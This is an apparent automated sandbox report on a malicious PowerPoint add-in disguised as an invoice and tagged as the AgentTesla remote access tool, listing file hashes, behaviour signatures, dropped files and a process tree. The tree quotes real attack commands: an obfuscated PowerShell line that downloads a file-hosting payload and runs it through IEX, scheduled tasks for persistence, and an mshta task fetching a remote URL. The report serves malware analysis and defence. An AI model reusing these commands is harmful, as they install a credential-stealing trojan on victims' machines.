Analysis
-
max time kernel
93s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
28/09/2022, 10:37
General
-
Target
invoice_7_812937_pdf (1).ppam
-
Size
43KB
-
MD5
abc10626cb26528d887b9a2268d300a3
-
SHA1
c8e7e2be906190ecfc038009c93df645ccbffb1b
-
SHA256
be62c35089f72b5317ea0c1bcb6d3a931205a98af434efd5b32410b6d9aa8fea
-
SHA512
bef8d4f713a7b3ab2ae5bbd6c3a8282951fc9889f067b6cbbb7ef2b217dbdd613554d588c8c8af34de5ed263eb0d550bb9dbf0842dc2b641876f93744fd6a320
-
SSDEEP
768:MAzJ/c/lsTsK/n/Okf6R9/i/LxC8vVJOQPdYI+4zrSNJAWWnxmT0gXJ1D5Jj5wJI:MAFkt09fmj7ajB0mxIPd3wU1/K8Nytst
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 7 IoCs
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\invoice_7_812937_pdf (1).ppam" /ou ""1⤵
- Drops startup file
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\wscript.exewscript.exe //b //e:jscript C:\\Users\\Public\\sys.ini2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -EP B -C (I'w'r('https://www.mediafire.com/file/rvzps961dmmyt8k/7.txt/file') -useB) | .('{#}{_}'.replace('_','0').replace('#','1')-f'^#','>').replace('>','I').replace('^','E').replace('#','X') | ping 127.0.0.13⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\holatyrimakachola\helloitsindian.vbs"4⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\holatyrimakachola\JIGIJIGI.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 120 /tn Appligation /F /tr "C:\ProgramData\holatyrimakachola\helloitsindian.vbs"6⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 45 /tn ChromiumPluginupdate /F /tr "C:\ProgramData\holatyrimakachola\ChromeExtentionUpdate.vbs"6⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\holatyrimakachola\JIGIJIGI.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\holatyrimakachola\GOLGAPORA.PS16⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7768⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7768⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2modmrci\2modmrci.cmdline"7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CA.tmp" "c:\Users\Admin\AppData\Local\Temp\2modmrci\CSCAACC12623F244B5B9C7E15EC3485FD4.TMP"8⤵
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wljxka3h\wljxka3h.cmdline"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FB8.tmp" "c:\Users\Admin\AppData\Local\Temp\wljxka3h\CSC4654EF89532F42B2AA10544E423319C8.TMP"8⤵
-
-
-
-
-
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.14⤵
- Runs ping.exe
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn MicrosoftUpdater /F /tr """Mshta""""""http://www.7fdkfjdaa.blogspot.com/atom.xml"""3⤵
- Creates scheduled task(s)
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD57ab7bf7e33430a729c4568d93bfd0c03
SHA1fe6402dccc065e695b74a87c195fe2656fb893d8
SHA25609937d9ab252f4b1de57a3ebefa7b7cb71d536b0b5ccad70e8313a9e0323f296
SHA51262166a40eb35427d2ca4e874c2301c35d49ced213342de17d8f390d24e9f39d50cd64cd75b0624554aa20edcc5f0d0f50ea805be1e6a3e24532dd545f0bd3448
-
Filesize
105B
MD57f53280ea46314479ed1d63b7d9625eb
SHA19a045c31da18e934b1ca4ce27b72daf0cbbd87fe
SHA25688bc996293478f62bb28814b1787c278a6dc0ed20fe8b11e3f644985b6514459
SHA512275868f4214bc8b874ec857f8938fc35fb77ef025596e1e0cdbea2d231864bec8c4ae09fb557c8dcbe95131c10962cc11744b210f1ec0c111db663fa27a7dbf3
-
Filesize
562B
MD58ea0ee4f4d6ccbabe4117cdd6f974011
SHA13271a608993c307046b3185c9a21d434d39fb19c
SHA256cfed6df2d13d6a842032d23d0b12429ca0ddb4ef2bba89f096a05ba44516c620
SHA5125b10ff90b6560956670c85f33266384f4ed401845e137e356ff15e4d613a6a6cc6ff42e68ccde85e0c49d58b7c20f25132ece60a2b60977dd1b3066e59cca61e
-
Filesize
387B
MD5f0ca1358f7cbc07ffadcdcbb09a8096e
SHA1a1839290fb16f5ccfbcbeec71bcfa4afaa842eaa
SHA256b964c3f6be44ac474f116783e4ca950b909109ff7ea1cf9db9a879a29beeae43
SHA51260fe0ab41793a5fd89a5ffad088a46b0cc8c4db06b8180446e1a4d036c7f81faf35fa726bc9f7b4231b99946ac3c99ae659b4e5a7611e10da2d86344fa620d2c
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5d29d027bff5b782d96f19e6b34fe5270
SHA135018b78d4738539f1613b6780204eaee2b27188
SHA2560387f0970a38ce5f3d22ff70c8dd620d200c7dcfd1f924f4152bcef221b9dfc8
SHA51274dcddb414483c75e8a6f3a899007723b8745e0901df8285a8e14164914a90d9fbb6ca97dedd90231b92fcc0b911483bc7efd6c9aac07e41ce61e35dd3f49a18
-
Filesize
3KB
MD5eea3cd2af18d508e388a1a0416745807
SHA1b98cde26805ca0d0cd631a48d28433fac98bdbb4
SHA256df3bbb3d67343b247c0fc877863b0e1540789a4b4c4066d6722fcf5df09d39b1
SHA512685d2317db000cbc4af93a574385a0d9f3265d52e04be97e81fd1ca63e0ba157ae24a35d4c85416b9e2438a0b468da5d6a2ace6573bba40994cbe3b963d566de
-
Filesize
1KB
MD559e1b34d61292ae8b1fc6717c8c54002
SHA119c4e7786017e60fc9a2685a6558f2474c5e3074
SHA2561ff9756459c56becbed8eb6c20ef3c7a84fad3e9b0d50eebb87bbebd20052b18
SHA512eac8573b31713e11d51324b0f2e9e6d03628bc816b9f632d832ed4a5acf57fabfa322d8d4eedc48b59a0e9ee2897981d3b78cc358ac63feb8955b9dd3a57da0e
-
Filesize
1KB
MD5ba9fcee13e04b18a091f52b7cd68758f
SHA1c75130933f6a736282eb6be2ef75ef7602548138
SHA25618d63d619e4ca01f8f16bc006e439ed3e2b0ab9373f240aa86ac0a78b6bea71e
SHA512e4a4d7e634d6006a705894401ff2a7989c722e89f172f68e5b302fd965229d36e9c8852bc91d43c392fdcc33b39bd0fe72d4d669afb9ad8d0bb577f3dc42c695
-
Filesize
3KB
MD5b4c1f8da586a03a9b2017343b997838a
SHA18f9a2c2b7941b6f321513868b3909757de2182f5
SHA256ae9c2c573f2243632e29d665670e67e2ae7b5a4bd1941e636768ca82301d091f
SHA5129da0d7b7174e69cf3ba803ed48cce8340964ec1166d40e2df9f694604f5281a8905ca6f6894a75d38e62bb8403bbd9cd69d26fff380135922c83153bb4ffe74f
-
Filesize
2KB
MD5fc93b33e961518156e4f11bb330e12fa
SHA12b569690c70532b0cfda40b12aa6a0991af98ea8
SHA2563e0d302eef9a4fbde2b6fa517d2a433fdda9f541f6d028ef5dff432f1208b376
SHA512f8037b74e61a218c96f91f018ba0ed6d57a04fcfe441185d0eeb7defd28882a9563126de2f0b46eff3a244181f071e8fc9ec8673c2938cfb2adecddfef5a859c
-
Filesize
424B
MD5d05db7ca65c16470a87f4c4007e9e026
SHA1ab4a5e6b4fbc331c345d88c39239f003f8dd3da7
SHA256c1412a0d2269b59df9d6b003b2f82f9479040dae4c4e12629db5845a6ac4c960
SHA512825d664f3df2ad4ef8b1e501e6a99aaae7d54db59b9308c34ad3d64b07a6792412beded53919ea8bf9e137f4a7e8aa7ac388a036ab256a1cce201a208ef311cb
-
Filesize
369B
MD51cbb151a9b8dfd5d8dbf36e365e1dfc7
SHA1fe554005d77624c9f703b395cdd8db0052ebdf3c
SHA2563b180bfc811459854d9b5f9ea84b39118e520b99b55b6cd61e3ecb1de875ed96
SHA512efde603852f759b9f5572e7869b1b2764e9e360a3e18ae727d440a85a324d523f682b857227695ca5050f95a992bfabf0111725f3f20ae4102d05e00ed6f3578
-
Filesize
652B
MD5c304fa7206fc1e632b6abefcd4a0bcdd
SHA11b14a5b9e9fc855706860b5a99eaaf5959a2f8da
SHA256c8f6348dbeca887a717a353a4153b8da29aaaa22639b4beb167764a0663a36ee
SHA5129651fe62018caafc5306216fbda4f8802197549ea5f564a29ac4c013b83aa9bd7e087ffcec5c0e6e972f0569fab0a17f9fd6896f4cce0e8a24dde51cd60ff270
-
Filesize
652B
MD5cea123f9b8e850027499c1f1aa269502
SHA1f4a3c50b7b92ae945075263cdfde1f028fee035e
SHA25671af4430d5fb1fdeef1ac254ff1e5cd200c64e0dc390e2f0bc68018361b0a729
SHA51297c379f13fc819ed438b08b09f89b52b7b923201c81ccf5049458a97978cfb8b5785797c95834ccf56b356f109f7869706f86222f00cf13e02015d2df69eb14c
-
Filesize
424B
MD55b0a710c68952a280e3737f249a789bb
SHA1cfd4349b3ebe8232b342fa6667e63d8027fcd26b
SHA25632781e50bffd54bf50e075fc3c5fea9bf02030c8aeb34344cf15592d702973ad
SHA51237efadb9ecade74d0f57bf0c5f5ff254203f952a7b54443433dadbc1e720d294ac6e3694a016520b99747a9856dc523d8a901f209285dba53863dd2e3e64e8ad
-
Filesize
369B
MD54ccb1317a232d0c8cd549461462a1898
SHA1eff21b51605f0ab6edbfe3914f141e1ba8955822
SHA256c51dc47f137fe78e1f4e2a2a41a80e52f12f8df08aeabbf107791f7aec8ce31d
SHA512dca4e7fb33e4e26a9a031d06011156f8cfc5480cd75f737e7fa6fe8d25990b57091a2c14567b8805dbfbc5418fc046534909bd8239ba7296ad24ec2969bbee50
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
5.7MB
-
Filesize
520KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB